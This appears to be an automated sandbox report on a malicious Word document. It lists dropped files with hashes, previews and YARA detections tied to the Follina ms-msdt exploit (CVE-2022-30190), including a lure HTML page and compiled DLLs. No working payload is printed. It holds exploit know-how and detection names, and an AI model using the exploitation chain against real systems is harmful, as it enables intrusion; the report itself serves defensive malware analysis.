                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2130
                                                                                                                                                                      Entropy (8bit):1.1618571236537212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1SXV5:mbb2sOhYk5vnZA5Rn/YnRn/doQ5
                                                                                                                                                                      MD5:4F8C0EAC84D2D1AEEDABF24EF834DEFF
                                                                                                                                                                      SHA1:7B75446CBB512AD6C13F12A35948E1548FD62864
                                                                                                                                                                      SHA-256:8FB6FE075C6777639474427C864A13E5EAB1ECF7016DD1C23B9CA8FA7A7D0188
                                                                                                                                                                      SHA-512:83839667E41A748A703F80D0CE533F37922433973EFC0949D34D2B3E7FFC8548A04682D97A1457CB7E92C667541EBB2BED0432A59084558A4BBE5E1CE8567494
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Joe Security
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9728
                                                                                                                                                                      Entropy (8bit):4.79749305864191
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:WKqedmYoNKvUTCSH3gR8H8FgwSHwBnkwZYPaSJ365OOieMjQZa2RnIj2K:bElNK8TCSfHyPnkwZ+vKOBQZXn2
                                                                                                                                                                      MD5:A3852564CA718AB40C68A255EEB0F8DF
SHA1:3A99D23AB2B157C0BD759FCA73047F8BB8611EF4
SHA-256:D05D1D1CAA819EEFFF6121EE9E746D96360EC76D8CFD77FFD8736CF9EFFCEB66
SHA-512:19134AB877F434B2564239218B5CB0865114D90E804673EE53980A685869134296A5347009E0AC37B43BB3E6D1E6FD821FC74EA65474BA2240DC687C1BB02F06
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.1008166912794564
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryO+PfGak7Ynqq1+PfXPN5Dlq5J:+RI+ycuZhNt+akSKfPNnqX
MD5:CCEC6FC0B20BEA34F917C387969FA636
SHA1:03EC62AE92518E8478297BD1F7A197EF0D71E113
SHA-256:BE61BE9DA2757D7EE9A09F1C07D6B13D60515FFC7417BA6C3FC503A0094B499A
SHA-512:9656E5185B2A211A44200B19D59A3E810D02D7FEAD0BE833064D4CDF914C4808CFFD5F8B00B14FBCF31E2FE9DD54302E100E2045E9FE9C7C0F0EC8B469EB5698
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:dropped
Size (bytes):1364
Entropy (8bit):4.093180645604145
Encrypted:false
SSDEEP:24:H7C9A+6UidkHKhKe3feI+ycuZhNt+akSKfPNnq9Wd:rLxdkAKe3m1ult+a3K9q9m
MD5:26E20DE969A81AD21D8C11428DD8D335
SHA1:D0B522B5F0B8C437683568C4ACC3CFFEF57F1196
SHA-256:6FA6A619B3D754E6ECBAF12B4801B98EE34B1E56DEA9C1942B118CF4B5393476
SHA-512:07D1DA0B64C34B3909CC2D890033647CA9120CE3778430D86736F4172F2DECEDF31C6FDA651840F747AB70B88C4ADBE764D85D3C6162495D780274253B9A1171
Malicious:false
Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP.................o....4......6..........5.......C:\Users\user\AppData\Local\Temp\RES1B1C.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
Category:dropped
Size (bytes):1368
Entropy (8bit):4.076886897377885
Encrypted:false
SSDEEP:24:H53W9o66GFmkHphKe3feI+ycuZhNHakSZPNnq9Yld:d/+FjXKe3m1ulHa3bq9YP
MD5:437DD08072E93358CBBD0EB7C0176472
SHA1:77D262C59FBA3C6B4002A9E38C829376EF60635B
SHA-256:84B9F374AB5B62DACB0079B86C28D3648BB8917B7EB3C6CCAD847A7342E475F6
SHA-512:290832204B93C94B84575B54545F69FB245676081AF572BE70AB7D8C429AB0CB094744192340EEA8E6EE1C8E8EA96A65E9DFD9937FA5BE8FCFE3E7546E6F94AE
Malicious:false
Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP....................&w.o...}...h............5.......C:\Users\user\AppData\Local\Temp\RES2969.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
Category:dropped
Size (bytes):1368
Entropy (8bit):4.087579112057223
Encrypted:false
SSDEEP:24:Hm3W9oVKpkHJhKe3feI+ycuZhN9akSLPNnq9Yld:A/VCk3Ke3m1ul9a3hq9YP
MD5:7810C97B7394B23F7585151B24284EC7
SHA1:2C1AD090AB3DFA44BEB3CF426427611242647D40
SHA-256:C98816400EDFA15F7D3EE43309F7E63C986046942F3DFEB93E4C4D647A98CAAE
SHA-512:B3F4F06C3F00309A40DD15E82F21048319A84D7B1577F325DECE02482ACF139E4DAB8EC5993FCD57EBC270AAFEF31051C7F5DB32DB614A761AD3437F05C13E66
Malicious:false
Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP...................T......Ed....t...........5.......C:\Users\user\AppData\Local\Temp\RES4732.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....(.....L.e.g.a.l.C.
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.0895003920163724
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7YnqqZPN5Dlq5J:+RI+ycuZhNHakSZPNnqX
MD5:CC7F2677166FB391007D83F88C688CA1
SHA1:AF0717ACCDF6F325737DC93AE8FFC17B46E7977F
SHA-256:120DEF284865455EA87557F01AF1118C8DD9F6BC03E733FC281EF2A636D746F4
SHA-512:E350EC8168352FA19CC9A4EC4F13A2E1E4643EB85B2EA3CD5EC0B2F20CF71162F710815DC8152F3BA8406623C0ADA6FC0D7C3A792028030A0322FA867F9A0F9C
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):5120
Entropy (8bit):3.782786887295759
Encrypted:false
SSDEEP:48:64oPhmKraYZkH8KTibUyPkwjj0JeC+CFSlwYNfc1ulHa3bq:ODaAkHHoxk8ZCuNnlK
MD5:766473A4C386B81551C7D3971EC5AC33
SHA1:3CD89F9EFCC926EFCAED14A32447CF4FA5CF71C0
SHA-256:BEA495B174127D5766239B72098729676749D125123E2E495687F098C0C51A7F
SHA-512:699BE66D691484E61B92F08BA27AB563BB48D257C1FC65F65CCA086B184EC0EAEB23878C6121EE63CA5CFAB7B4DDCA6687FAB3EE95CC101DF414643272240E53
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.11145665806792
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryd9ak7Ynqq2SPN5Dlq5J:+RI+ycuZhN9akSLPNnqX
MD5:E9549296A3E219BE4564CF14A090740B
SHA1:77CD8D88D1CDAB155492F98D34EDCC59AB7DB6F5
SHA-256:F79F6A4A3E7CC613B15D726492556057E4412FD788E3A3BF35297499DACCBBFD
SHA-512:E7BED82FB85D1520F3157836119F0A20F98522AA2680FF4DEA29CF32B0CF8BC5D5B62B3FA7A0C3A80BA5589097D81E83E77D5424B902C8C6EA0C4E9F667F58EE
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3584
Entropy (8bit):3.088648770844524
Encrypted:false
SSDEEP:24:etGSo89pz1qlkCe745Q7GslPor9jvX5ekjV4gztkZfhy6Iv+CqzOBWI+ycuZhN9B:6dpqb927GslPyDRjyJhok1ul9a3hq
MD5:3BC757DB7B82771A228AC8E6B156076A
SHA1:E8E6F16F1469AFFB683D65208D5DF1BE4D738473
SHA-256:ED86906E5744CF340300AD2CA8F96FE0D04EF4EB01770E9B9E0FDF17F90B3A73
SHA-512:BB091D5BFF577921887F0C8CEA33B50B2C00D38A773BC6DB1A7EE6460656C1E30A95E887001631AC623D30AFE0870DC61D0642DF2BBFDB719E413FD116E495E1
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:53 2022, mtime=Wed Jun 8 01:50:16 2022, atime=Wed Jun 8 01:50:04 2022, length=10144, window=hide
Category:dropped
Size (bytes):1045
Entropy (8bit):4.711472390862526
Encrypted:false
SSDEEP:12:8hAdC0A0UH6CHic4FpGXQDHs+WGG3A/bYbjAA/y/lHm2NDyUDk36k3o4t2Y+xIBx:8hk+JOkKHdqA0AAKJDyg7aB6m
MD5:25480BE39C79A08C7076EA996A394D31
SHA1:2D2D42155FA93FAF073DA0A3F1257ABC2575F3B6
SHA-256:2390F6D1EB3B92CAEBBF23BD87C2F87D6DF960DA6624AC32D271D75F93797D08
SHA-512:25B330A517002DEA83F6BF9004D97D8DAFD45B6FB366F124DDDD767DE1768BBDC0AF7A5A43323636D08D47C85ABC54EE65F77C37F96A222DC9ADC398950FCA2C
Malicious:false
Preview:L..................F.... ....V..3...G.{.z../.]t.z...'...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...T9.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..T9......S......................K.a.l.f.o.n.s.....~.1.....hT....Desktop.h.......NM..T9......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2..'...TC. .DOC782~1.DOC..H......hT...TC.............................".d.o.c.7.8.2...d.o.c.x.......R...............-.......Q...........>.S......C:\Users\user\Desktop\doc782.docx..".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...Aw...`.......X.......855271...........!a..%.H.VZAj...-..s.........W...!a..%.H.VZAj...-..s.........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@.
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):64
Entropy (8bit):4.601202445739505
Encrypted:false
SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
MD5:538F5016C24249AC1799BBBB20B4BD97
SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
                                                                                                                                                                      SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):3.039103887420846
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                      MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                      SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                      SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                      SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20
                                                                                                                                                                      Entropy (8bit):2.8954618442383215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                      MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                      SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                      SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                      SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..p.r.a.t.e.s.h.....
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):3.039103887420846
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                      MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                      SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                      SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                      SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24702
                                                                                                                                                                      Entropy (8bit):4.37978533849437
                                                                                                                                                                      Encrypted:false
